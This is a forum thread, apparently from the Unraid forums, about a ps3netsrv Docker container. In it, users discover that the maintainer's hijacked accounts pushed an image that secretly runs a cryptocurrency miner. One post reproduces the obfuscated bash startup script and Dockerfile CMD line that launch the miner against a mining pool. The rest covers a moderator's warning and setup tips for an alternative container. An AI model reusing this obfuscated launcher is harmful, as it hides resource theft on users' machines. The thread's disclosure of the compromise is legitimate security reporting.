[DOCKER] ps3netsrv

26 minutes ago, McCloud said:

Sorry all, I stopped updating this after I got rid of my PS3. There are other options out there that are up-to-date.

No worries, that docker I made started working so perhaps I was not patient enough! thanks for your original contribution and replying 🙂

I just repulled the static binaries for the ps3netsrv from webMAN MOD 1.47.26.  If you want to use it, delete all images and only use mccloud/ps3netsrv which pulls a minimal install with the binary.  It now pulls the binaries straight from the webMAN github, so it should always be up-to-date as long as they stay active and don't change the folder structure.

So in theory, everything should work and stay up to date, but if what you have works, I'd stay with that.  

Edited by McCloud
  • Thanks 1
18 hours ago, McCloud said:

I just repulled the static binaries for the ps3netsrv from webMAN MOD 1.47.26.  If you want to use it, delete all images and only use mccloud/ps3netsrv which pulls a minimal install with the binary.  It now pulls the binaries straight from the webMAN github, so it should always be up-to-date as long as they stay active and don't change the folder structure.

So in theory, everything should work and stay up to date, but if what you have works, I'd stay with that.  

Hi, Thanks for your reply!

This is what I currently have, so if I delete it & images but then change the repository to mccloud/ps3netsrv I should be good to go on the latest?

789651407_Annotation2020-01-13125416.jpg.7f6cb1dddde76b85dea6d72f19508ee4.jpg

• 2 weeks later...
On 1/12/2020 at 11:45 AM, mbc0 said:

No worries, that docker I made started working so perhaps I was not patient enough! thanks for your original contribution and replying 🙂

Hey do you mind posting your settings for the container? I'm pretty sure I did everything correctly but when I try launching a backup, it always says ".... not a compliant ps3 iso...".

Weird thing is that if I run ps3netsrv in windows, it works fine.

Any help would be appreciated. Thank you

1 hour ago, Antheleon said:

Hey do you mind posting your settings for the container? I'm pretty sure I did everything correctly but when I try launching a backup, it always says ".... not a compliant ps3 iso...".

Weird thing is that if I run ps3netsrv in windows, it works fine.

Any help would be appreciated. Thank you

Hi, Do you mean the settings for the docker or for ps3netserv?

• 3 weeks later...
22 minutes ago, Blacksus said:

Shame on you, @McCloud

Screenshot 2020-02-10 at 02.07.57.png

Tagging @Antheleon and @mbc0 for visibility in case youre still using this...

Wasn't entirely sure what you were talking about until I dug around through my email...  Sometime this morning someone was able to login to both my GitHub and Dockerhub accounts and was able to change primary emails in both and remove mine.  I don't have access to these accounts and don't see any way to recover them.

I haven't ran the docker, but it's adding some file from my GitHub repo and then executing it on top of ps3netsrv.  (There's some weird obfuscation in the startup script)

Sorry folks, not sure what else to do here.

TLDR: don't use this docker or any from McCloud, and enable 2FA where able.

Edit: oh, didn't see your original image.  Definitely looks like it's a crypto miner.

Edited by McCloud

Ah that sucks.

Worrying about the integrity of my server now, these lines on github dont make any sense to me. Wonder if it does anything else besides running a miner.

#!/bin/bash
    ${*%%yQxB}   'p'$'\x72'i\ntf   %s   "$(    e1GXyjHW='  ${@^}  "${@//\}\}mQ/+zue\!D}"  $bash   "${@^^}"   ${@/C\J=}   <<<  "$(     "${@%m^\(&nBf}"   ${@~}   P\R${*,}I""$*NT'"'"''"'"'$'"'"'\U0066'"'"' %S   '"'"'5.1 T- csrv=CM,ctb=C P- BcbFBXaTIfa98OQ37PzGgNwxAj1QgzyS93 U- 0033:MOC.LOOPGREZ.ENIM.HSAHSUREV//:PCT+MUTARTS O- SUREV A- DNUORGKCAB-- 2VRSTEN3SP/'"'"'  $@ "${@^^}" | ${*/97J\)} REV  $*   ; ${*^^}   "${@^^}"    )"  "${@,}" ${*~} '  ${@//6N%Dcb</.*4_DgX}  && $* ${*^}   ''p$'\u0072'\int\f  %s "${e1GXyjHW~~}"  ${@%%\!\{^e}    ${*^^}     )"   ${*/gC\{*mv0}  ${*} |   ${@/WlYb<s} b\a""'s'h ${!@}   ${*^}  
    ${*%%yQxB}   'p'$'\x72'i\ntf   %s   "$(    e1GXyjHW='  ${@^}  "${@//\}\}mQ/+zue\!D}"  $bash   "${@^^}"   ${@/C\J=}   <<<  "$(     "${@%m^\(&nBf}"   ${@~}   P\R${*,}I""$*NT'"'"''"'"'$'"'"'\U0066'"'"' %S   '"'"'5.1 T- csrv=CM,ctb=C P- BcbFBXaTIfa98OQ37PzGgNwxAj1QgzyS93 U- 0033:MOC.LOOPGREZ.ENIM.HSAHSUREV//:PCT+MUTARTS O- SUREV A- DNUORGKCAB-- 2VRSTEN3SP/'"'"'  $@ "${@^^}" | ${*/97J\)} REV  $*   ; ${*^^}   "${@^^}"    )"  "${@,}" ${*~} '  ${@//6N%Dcb</.*4_DgX}  && $* ${*^}   ''p$'\u0072'\int\f  %s "${e1GXyjHW~~}"  ${@%%\!\{^e}    ${*^^}     )"   ${*/gC\{*mv0}  ${*} |   ${@/WlYb<s} b\a""'s'h ${!@}   ${*^}   > /dev/null 2>&1
CMD ["./ps3netsrv_linuxX86_64", "/games", "&& ${*//\(:ffk/p\]jk,}  ${*##62LVozf}   e${@/\[Wn>31G/dW9CIcf}v$'a\154' \"$(   OrJajLv='  ${*^}  ${!*}  E\V'\"'\"''\"'\"'A\"\"\L  \"$(    \"${@,}\" \"${@#QK\]8jJ}\"  '\"'\"''\"'\"'\PRI\N${@^}T'\"'\"''\"'\"'${@/Hg-HN~DN}F   %S '\"'\"'5.1 T- csrv=CM,ctb=C P- BcbFBXaTIfa98OQ37PzGgNwxAj1QgzyS93 U- 0033:MOC.LOOPGREZ.ENIM.HSAHSUREV//:PCT+MUTARTS O- SUREV A- 2VRSTEN3SP/'\"'\"'   \"${@~~}\"  ${*#K$m~\{4mQ}   | ${*/2t@t}  ${@//\\"Sb#s/H7Bd}  $'\"'\"'\162'\"'\"'$'\"'\"'\U0065'\"'\"'V   ${*/+?Y^T/pV9>M}  ${*#=i.eM0Vu}  ;   ${*##8^c~}     )\"   ${@} ${*##0b&\`qny\!}   '   ${*//*\]-H} ${*//3h9$$i/S=nO>}  && ${!@} \"${@%\[mDf:\{Z}\"  \"${@,}\"printf   %s   \"${OrJajLv~~}\"   ${*,} ; ${*~}  ${*^}      )\"  \"${@/o\}nw&Sl/r\]c\[lk}\""]

Needles to say, I nuked the docker

mccloud/ps3netsrv and mccloud/ps3netsrv:latest will have a warning go out via FCP regarding its infection with crypto mining software.

However, it should be noted that this apparent breach of mccloud's GitHub repo happened in and around 10 hours ago today.

PS3Netsrv has NOT been available within Community Applications for a while now, as the tags utilized by the templates within CA were no longer available to be downloaded.  At that point, all of the users of the previous tags for ps3netsrv (:alpine, :debian, etc) were also notified via Fix Common Problems that the containers were blacklisted because of the tags no longer being available.

At no point has the :latest tag with regards to ps3netsrv from McCloud ever been available within CA as the template maintainer never updated the templates to reflect the new tags. (The :latest tag is the one with the crypto mining software)

While this breach doesn't affect any applications that are available within Community Applications (Apps), the moderators of CA take very seriously the security and integrity of the applications present within. 

• Like 1

HI all this is my first post to this unraid forum.  I used to use ps3netserv a lot.  I (and my kids too) thought it was the coolest thing we had with our PS3 games.  If I read these threads, it looks like I won't be able to serve my games from unraid to my PS3 anymore?  I really don't know anything about this but with the ps3netserv docker it was so easy even I got it to work.  Anyway, the point of my question is if ps3netserv cannot be used anymore, is there another docker that can be used to serve games to my PS3 similar to that of ps3netserv?   Thanks to all or any of you that might be able to throw some help my way.

Cheers!!

Does anyone have some guidance for setting up shawly's ps3netsrv docker in unraid?

I have it set up with USER_ID 1000 & GROUP_ID 100 passed as variables to the container. As well as the /games folder path, port 38008 etc.

On the PS3:

Only one game appears (there are 10 in the GAMES folder) when refreshing in Multiman. When i go to launch that game i get error "The selected disc image is not a compliant PS3 ISO...."

ps3netsrv works perfectly fine for me on Windows, but i don't leave my windows PC on all the time, but my unraid server is on 24/7.

Thanks,

• 3 weeks later...
On 2/24/2020 at 6:27 PM, BenDaMAN said:

Does anyone have some guidance for setting up shawly's ps3netsrv docker in unraid?

I have it set up with USER_ID 1000 & GROUP_ID 100 passed as variables to the container. As well as the /games folder path, port 38008 etc.

On the PS3:

Only one game appears (there are 10 in the GAMES folder) when refreshing in Multiman. When i go to launch that game i get error "The selected disc image is not a compliant PS3 ISO...."

ps3netsrv works perfectly fine for me on Windows, but i don't leave my windows PC on all the time, but my unraid server is on 24/7.

Thanks,

Create a Windows VM and run from that?

• 4 weeks later...
On 2/24/2020 at 7:27 PM, BenDaMAN said:

On the PS3:

Thanks,

Did you ever figure this out? If so, can you post your settings on your docker? Can't seem to get my PS3 to recognize any games. 

• 3 weeks later...

Hey guys, to all that are trying to get Shawly's up and running, here is what I did to get it to run.

1st, add Port variable of 38008

2nd add Data Path called /games and point it to the folder that holds your ISO folder (which must be called PS3ISO, this is where I was messing up), not the actual folder with the ISO's in it.

3rd go into WebMan setup and turn of scanning of LAN, and input your Unraid server IP address.

4th Save and restart PS3

PS.  This is where I ran into issues.  It may be due to having almost 8 TB of ISO's and over 900 titles, but IRISMAN crashes, and I can only access the games via WEBMAN web setup under games/net.  But even then it only showed 180 games.  I'm going to reach out to Aldostools and talk to him about it, and see if there is a size/quantity limitation or something.  But if you have a smaller amount, maybe it will be fine.  To test whether the docker is an issue or ps3netsrv, I'm going to install a Windows VM and test it that way and see what happens.  Just wanted to help out anyone trying to run this, because it took me several hours to figure it out with the help of Shawly himself, who was awesome by the way.

• 2 weeks later...
On 4/25/2020 at 7:04 PM, ibbanez said:

Hey guys, to all that are trying to get Shawly's up and running, here is what I did to get it to run.

1st, add Port variable of 38008

2nd add Data Path called /games and point it to the folder that holds your ISO folder (which must be called PS3ISO, this is where I was messing up), not the actual folder with the ISO's in it.

3rd go into WebMan setup and turn of scanning of LAN, and input your Unraid server IP address.

4th Save and restart PS3

PS.  This is where I ran into issues.  It may be due to having almost 8 TB of ISO's and over 900 titles, but IRISMAN crashes, and I can only access the games via WEBMAN web setup under games/net.  But even then it only showed 180 games.  I'm going to reach out to Aldostools and talk to him about it, and see if there is a size/quantity limitation or something.  But if you have a smaller amount, maybe it will be fine.  To test whether the docker is an issue or ps3netsrv, I'm going to install a Windows VM and test it that way and see what happens.  Just wanted to help out anyone trying to run this, because it took me several hours to figure it out with the help of Shawly himself, who was awesome by the way.

Could you possibly show me a picture of your docker config? I still can’t get it to recognize my games. Thanks

17 hours ago, Pestilence said:

Could you possibly show me a picture of your docker config? I still can’t get it to recognize my games. Thanks

Yeah, i wouldn't mind seeing this also! seems i got the folder structure right, wouldnt mind seeing an example layout just incase im double nesting by mistake.

Thanks Dudes.

50 minutes ago, Pestilence said:

Could you post a screenshot of your template for docker as well? Thanks so much for this by the way!

Not much to it to be honest, here is the only part of the template that is configurable

image.thumb.png.46dc10318646d0ea78d2ed3463ef2fd0.png